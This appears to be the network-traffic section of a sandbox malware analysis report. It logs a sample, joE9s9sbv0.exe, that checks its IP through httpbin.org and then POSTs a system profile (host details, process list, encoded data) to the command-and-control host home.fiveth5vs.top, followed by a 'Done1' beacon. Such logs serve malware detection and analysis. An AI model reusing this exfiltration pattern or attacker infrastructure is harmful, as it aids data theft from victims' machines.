                                Dec 31, 2024 15:42:07.104465961 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104484081 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104501963 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104513884 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104532957 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104547024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104573965 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104583979 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104636908 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104654074 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104686975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104696989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104734898 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104744911 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104774952 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104798079 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104825020 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104830027 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:07.104835987 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104875088 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104886055 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104923964 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104934931 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104969025 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.104978085 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105014086 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105027914 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105073929 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105088949 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105113983 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105123043 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105154991 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105165005 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105200052 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105249882 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105259895 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105292082 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105308056 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105315924 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105324984 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105345011 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105361938 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105372906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105397940 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105416059 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105434895 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105452061 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105468035 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105477095 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105504990 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105514050 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.105523109 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109637976 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109683037 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109709024 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109762907 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109812975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109822989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109869003 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109878063 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109916925 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109937906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109961987 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109976053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.109986067 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110009909 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110019922 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110028982 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110234022 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110313892 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110323906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110352039 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110362053 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110409975 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110419989 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110446930 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110466003 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110496044 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110505104 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110518932 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110534906 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110551119 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110559940 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110590935 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110608101 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.110618114 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:07.151458025 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.666174889 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.674068928 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:09.683135033 CET8049705176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:09.683247089 CET4970580192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.831590891 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.836409092 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:10.836572886 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.837517023 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:10.842303991 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.620419979 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.620979071 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:11.625956059 CET8049706176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:11.626013041 CET4970680192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.464764118 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.469603062 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:12.469763994 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.469966888 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:12.474805117 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.348244905 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.348788977 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:13.353780031 CET8049707176.53.146.223192.168.2.10
                                Dec 31, 2024 15:42:13.353899002 CET4970780192.168.2.10176.53.146.223
                                Dec 31, 2024 15:42:23.271250963 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.276216984 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.278846025 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.283834934 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.725989103 CET5211653192.168.2.101.1.1.1
                                Dec 31, 2024 15:42:23.730951071 CET53521161.1.1.1192.168.2.10
                                Dec 31, 2024 15:42:23.731004000 CET5211653192.168.2.101.1.1.1
                                 Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                 Dec 31, 2024 15:42:03.514919043 CET  63072        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:03.514991045 CET  63072        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:03.522161007 CET  53           63072      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:03.522181988 CET  53           63072      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:05.846550941 CET  63075        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:05.846730947 CET  63075        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:06.451459885 CET  53           63075      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:06.559683084 CET  53           63075      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:09.973026037 CET  63077        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:09.973100901 CET  63077        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:10.640821934 CET  53           63077      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:10.830311060 CET  53           63077      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:11.686325073 CET  63079        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:11.686402082 CET  63079        53         192.168.2.10  1.1.1.1
                                 Dec 31, 2024 15:42:12.064359903 CET  53           63079      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:12.463388920 CET  53           63079      1.1.1.1       192.168.2.10
                                 Dec 31, 2024 15:42:23.269282103 CET  53           63543      1.1.1.1       192.168.2.10
                                 Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
                                 Dec 31, 2024 15:42:03.514919043 CET  192.168.2.10  1.1.1.1  0xd27     Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:03.514991045 CET  192.168.2.10  1.1.1.1  0x7b62    Standard query (0)  httpbin.org         28              IN (0x0001)  false
                                 Dec 31, 2024 15:42:05.846550941 CET  192.168.2.10  1.1.1.1  0x39fb    Standard query (0)  home.fiveth5vs.top  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:05.846730947 CET  192.168.2.10  1.1.1.1  0x79bc    Standard query (0)  home.fiveth5vs.top  28              IN (0x0001)  false
                                 Dec 31, 2024 15:42:09.973026037 CET  192.168.2.10  1.1.1.1  0x558c    Standard query (0)  home.fiveth5vs.top  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:09.973100901 CET  192.168.2.10  1.1.1.1  0xb0b6    Standard query (0)  home.fiveth5vs.top  28              IN (0x0001)  false
                                 Dec 31, 2024 15:42:11.686325073 CET  192.168.2.10  1.1.1.1  0xb686    Standard query (0)  home.fiveth5vs.top  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:11.686402082 CET  192.168.2.10  1.1.1.1  0x2f46    Standard query (0)  home.fiveth5vs.top  28              IN (0x0001)  false
                                 Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
                                 Dec 31, 2024 15:42:03.522161007 CET  1.1.1.1    192.168.2.10  0xd27     No error (0)  httpbin.org         -      34.200.57.114   A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:03.522161007 CET  1.1.1.1    192.168.2.10  0xd27     No error (0)  httpbin.org         -      34.197.122.172  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:06.559683084 CET  1.1.1.1    192.168.2.10  0x39fb    No error (0)  home.fiveth5vs.top  -      176.53.146.223  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:10.830311060 CET  1.1.1.1    192.168.2.10  0x558c    No error (0)  home.fiveth5vs.top  -      176.53.146.223  A (IP address)  IN (0x0001)  false
                                 Dec 31, 2024 15:42:12.064359903 CET  1.1.1.1    192.168.2.10  0xb686    No error (0)  home.fiveth5vs.top  -      176.53.146.223  A (IP address)  IN (0x0001)  false
                                • httpbin.org
                                • home.fiveth5vs.top
                                 Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                 0           192.168.2.10  49705        176.53.146.223  80                2788  C:\Users\user\Desktop\joE9s9sbv0.exe
                                 Timestamp                            Bytes transferred  Direction  Data
                                 Dec 31, 2024 15:42:06.587050915 CET  12360              OUT        POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                 Host: home.fiveth5vs.top
                                 Accept: */*
                                 Content-Type: application/json
                                 Content-Length: 500830
                                Data Ascii: { "ip": "8.46.123.189", "current_time": "8468739163627455163", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe" [TRUNCATED]
                                Dec 31, 2024 15:42:06.591928959 CET2472OUTData Raw: 53 6e 31 2b 58 36 6b 4c 78 38 68 5c 2f 66 5c 2f 50 36 5c 2f 77 43 66 52 74 57 4b 5c 2f 55 58 5c 2f 41 49 4a 54 66 38 45 39 5c 2f 77 42 6e 37 39 73 48 77 68 38 61 50 6a 52 2b 30 68 6f 6d 71 5c 2f 45 57 32 38 4f 66 46 37 57 50 68 44 34 4e 38 46 70
                                Data Ascii: Sn1+X6kLx8h\/f\/P6\/wCfRtWK\/UX\/AIJTf8E9\/wBn79sHwh8aPjR+0homq\/EW28OfF7WPhD4N8Fp4q8WeFNG0K38L+HvDWv6jrck\/g7WtA1S8u9UXxZp1tDA2opZ2x028uJra6nv0ktv5s+kl9ISXgFk3CmIwHBz42z7jDO8VlWWZXX4g\/wBVsrw+Hy3Lq2ZZlmGZZ3DJeI8TRjRpxoUMNhsLkeNq4rEYmKlLDUadSt
                                Dec 31, 2024 15:42:06.591974974 CET4944OUTData Raw: 41 6e 72 30 36 6e 70 54 4b 44 59 70 6e 5c 2f 6c 6e 2b 48 39 4b 67 66 70 2b 50 39 44 56 33 59 33 70 5c 2f 4c 5c 2f 47 6f 5a 46 63 37 44 39 5c 2f 5c 2f 41 44 5c 2f 50 74 37 66 6a 51 58 44 66 35 66 71 69 6d 56 5c 2f 75 4a 5c 2f 35 46 2b 6e 58 5c 2f
                                Data Ascii: Anr06npTKDYpn\/ln+H9Kgfp+P9DV3Y3p\/L\/GoZFc7D9\/\/AD\/Pt7fjQXDf5fqimV\/uJ\/5F+nX\/AOtUPl\/3\/wDv3x\/k\/wCce1n\/AFf8Hz\/z9P8AP+NM+9nZ+Ht9f8\/nQdpW\/wB\/HXn\/ACe9Qp0\/7ZD+bVafr+H9TUbf6vZs\/Dn\/ADx+v8g6CHJ9\/wDvz\/8AXqGT\/b\/eDnAqzt\/j\/Hp+OM0zy+
                                Dec 31, 2024 15:42:06.591991901 CET4944OUTData Raw: 34 73 2b 4a 58 78 74 38 45 5c 2f 45 44 34 69 65 45 37 43 62 34 6e 58 6e 69 54 58 5a 66 45 50 77 39 38 52 66 44 54 77 48 70 45 6c 31 34 70 38 4f 36 5c 2f 34 4d 73 4e 64 31 36 2b 31 44 52 76 46 57 70 61 46 66 65 4b 64 4d 31 53 37 38 4e 61 62 6f 74
                                Data Ascii: 4s+JXxt8E\/ED4ieE7Cb4nXniTXZfEPw98RfDTwHpEl14p8O6\/4MsNd16+1DRvFWpaFfeKdM1S78Nabotpe2+g3s\/+T3GHEcMLxjwlh8DLNMweTTzXMOJcFkWGxOZ1MFluKwMcHhJ5jhMFTrShOpiq0cRQhWjGpPB4bHvDRqYiWHhV\/wB5fAbwlxOc+AfjnmnElLg3hWHH1Dgjhjwi4h8Ss1yrg7C8Q8WZPxLLP88w\/Cmec
                                Dec 31, 2024 15:42:06.592029095 CET2472OUTData Raw: 2b 6d 5c 2f 62 5c 2f 41 45 58 74 78 5c 2f 6e 46 4d 6b 62 2b 2b 6d 5c 2f 5c 2f 41 4a 62 66 75 5c 2f 38 41 6c 6a 5c 2f 2b 75 70 39 72 35 79 5c 2f 72 35 6e 51 51 74 39 31 39 5c 2f 77 41 69 66 39 63 76 33 5c 2f 38 41 6e 36 6e 39 61 5a 35 6e 33 4f 6e
                                Data Ascii: +m\/b\/AEXtx\/nFMkb++m\/\/AJbfu\/8Alj\/+up9r5y\/r5nQQt919\/wAif9cv3\/8An6n9aZ5n3On\/AH96\/wCf5Gp9r\/cc\/P5v733471V2vIoT93tk\/wCWfleQef1559uaoB8n7tkz5iPb5lijllx0HfrR5btH9zfiLzYo\/N\/f\/Zx7cD\/6\/wCgdse9H\/55eV\/XH+eaPnP3Ek\/1vm2vp+Wf89qAK3lq38G
Dec 31, 2024 15:42:06.592170954 CET | 4944 | OUT | Data Raw: 72 78 61 38 52 36 75 5a 34 48 67 44 77 77 38 52 65 4f 73 58 77 33 6a 61 56 4c 69 50 44 63 48 63 45 38 53 38 54 56 2b 48 36 2b 49 57 4c 6f 34 57 68 6e 64 48 4a 63 74 78 31 54 4b 61 2b 4c 71 59 4c 4d 4b 65 46 70 59 36 46 43 64 65 65 58 34 36 4e 4a
                                Data Ascii: rxa8R6uZ4HgDww8ReOsXw3jaVLiPDcHcE8S8TV+H6+IWLo4WhndHJctx1TKa+LqYLMKeFpY6FCdeeX46NJSlhayh\/2SZp4oeF\/ANDK8Zxx4kcA8GYXiLDVavD+I4r4w4e4do57h8OsJVxVfJqucZjg6eZ0cNSx2BqYirgpV4UYY\/ByqSUcTRc\/0D0Z+Iycnpj16HP8q\/Av\/gpR4E8MeCf2iornwxpi6afHXgbTPHfiKOJ
Dec 31, 2024 15:42:06.592197895 CET | 2472 | OUT | Data Raw: 6e 2b 66 70 33 78 7a 5c 2f 53 6e 70 47 4e 72 5c 2f 75 59 39 6d 50 34 5c 2f 70 78 61 5c 2f 77 44 58 39 33 70 6b 6d 66 4d 66 5c 2f 77 42 70 5c 2f 75 49 50 54 36 2b 5c 2f 57 73 7a 55 5a 48 73 38 77 37 38 37 5c 2f 77 44 56 53 5c 2f 38 41 79 56 2b 48
                                Data Ascii: n+fp3xz\/SnpGNr\/uY9mP4\/pxa\/wDX93pkmfMf\/wBp\/uIPT6+\/WszUZHs8w787\/wDVS\/8AyV+H9KYJC3zo+X\/55\/8ATvj0z16U\/cnzo7\/JL9n\/AOWv\/k1\/TrUPzrv2J5f7v\/Vx\/wDLb\/Su\/wCn+eaDoIZG3MiJl\/8Aj4x\/L\/Pf8uWeYfuIm\/8Adf0\/H\/TsdsdwPpMq\/NsGUf8Az\/ov1okyyz
Dec 31, 2024 15:42:06.592317104 CET | 2472 | OUT | Data Raw: 73 74 6e 72 47 71 61 48 4c 47 6d 71 32 37 72 4c 65 36 52 64 4e 61 58 52 74 66 50 57 31 75 4a 59 54 4b 68 4d 54 50 61 77 79 46 43 70 65 4b 4e 69 55 48 34 6a 68 66 42 76 36 4f 32 44 34 75 35 4b 48 42 5c 2f 43 66 2b 73 6c 62 42 79 7a 53 4f 56 31 70
                                Data Ascii: stnrGqaHLGmq27rLe6RdNaXRtfPW1uJYTKhMTPawyFCpeKNiUH4jhfBv6O2D4u5KHB\/Cf+slbByzSOV1p4nFYD6nTr06EsVQyHFYqtkFKMK9SlT\/cYCE4SnC0UpRb\/AKMxnj79KnMOBXLEcfcdf6o4bH08mqZzh6eFwWZ\/X8ThsRiaeCxPE2DwWH4orzrYbC4movrGZ1IThRq3k3Fo9Gkmgm+aZUWXGCSSx4zgZOTgenbnH
Dec 31, 2024 15:42:06.596781969 CET | 2472 | OUT | Data Raw: 41 34 5a 55 73 52 69 4d 56 6a 56 67 61 45 73 56 69 34 34 58 44 59 57 6a 57 72 34 69 70 52 77 38 4a 56 58 53 70 55 35 31 5a 52 6a 4c 6b 68 4a 70 6f 39 44 68 37 67 33 69 62 69 71 6e 6a 4b 32 51 5a 54 57 7a 43 68 6c 30 38 42 54 78 2b 49 6a 56 77 32
                                Data Ascii: A4ZUsRiMVjVgaEsVi44XDYWjWr4ipRw8JVXSpU51ZRjLkhJpo9Dh7g3ibiqnjK2QZTWzChl08BTx+IjVw2Hw2ClmeNoZdgZYvE4uvQoYeniMdiaGGjWq1I0oVKsPaThF8w+vdv2Y\/2v\/2ov2MJPGmnfAjVPhtrvgrx\/wCJJ\/GOteBvixoOu6no9h4puLC30+71rSLzwtrGha1Hc6jbW1nFeRnU4bUw6TpUbW05ild\/PvHH
Dec 31, 2024 15:42:06.596818924 CET | 4944 | OUT | Data Raw: 47 44 55 42 61 79 51 58 4c 32 54 33 4d 4d 58 32 75 4f 32 75 4c 61 65 57 44 7a 49 34 62 6d 32 6b 64 5a 34 5c 2f 31 61 50 38 41 77 57 33 5c 2f 41 47 68 5c 2f 34 66 68 52 38 45 52 39 62 4c 78 2b 66 35 65 4f 31 72 38 61 64 64 68 30 7a 52 76 68 32 33
                                Data Ascii: GDUBayQXL2T3MMX2uO2uLaeWDzI4bm2kdZ4\/1aP8AwW3\/AGh\/4fhR8ER9bLx+f5eO1r8addh0zRvh23jex+I\/wk8YeJNP+CnwR\/aI8U\/BjwjrnxGl+LfhD4QftAx+C18AeMdTtfE\/wm8K\/D3W7JL\/AOIvgfSvE8Hgb4i+Lb7w5e+JtNkvrX+zjcX8DPEw0LQPiFqHwosfir8FPFXxI8Jw\/GmP4peCtB8TfEODW\/h
Dec 31, 2024 15:42:06.596900940 CET | 2472 | OUT | Data Raw: 5c 2f 6c 5c 2f 6e 36 56 50 48 2b 37 47 39 50 6b 66 5c 2f 41 4a 5a 64 76 38 39 4f 5c 2f 70 55 50 6c 76 38 41 4f 5c 2f 50 2b 54 39 50 31 50 35 38 55 41 52 78 37 31 32 5a 54 5a 35 6e 37 72 39 35 5c 2f 68 5c 2f 68 2b 74 51 73 79 52 53 66 38 74 50 38
                                Data Ascii: \/l\/n6VPH+7G9Pkf\/AJZdv89O\/pUPlv8AO\/P+T9P1P58UARx712ZTZ5n7r95\/h\/h+tQsyRSf8tP8Anl38j7P\/AFz\/ADqy0n8aGN3kz+7k\/wA+n+exZHG8cbj7\/eXig6CH5U2b\/L2f88\/5f\/Xpf3nlumz\/AJZfvZPN\/wDJX\/P1pI1+5sXY5lz5cnH+TQvzLs3x\/wDTLzOv6j\/jxrT2nl+P\/AA\/X749aZ
Dec 31, 2024 15:42:09.666174889 CET | 138 | IN | HTTP/1.1 200 OK
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:09 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1
                                Data Raw: 30
                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49706 | 176.53.146.223 | 80 | 2788 | C:\Users\user\Desktop\joE9s9sbv0.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 15:42:10.837517023 CET | 98 | OUT | GET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
Dec 31, 2024 15:42:11.620419979 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:11 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49707 | 176.53.146.223 | 80 | 2788 | C:\Users\user\Desktop\joE9s9sbv0.exe
Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 15:42:12.469966888 CET | 171 | OUT | POST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
Dec 31, 2024 15:42:13.348244905 CET | 353 | IN | HTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49704 | 34.200.57.114 | 443 | 2788 | C:\Users\user\Desktop\joE9s9sbv0.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 14:42:04 UTC | 52 | OUT | GET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
2024-12-31 14:42:04 UTC | 224 | IN | HTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:42:04 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
2024-12-31 14:42:04 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}
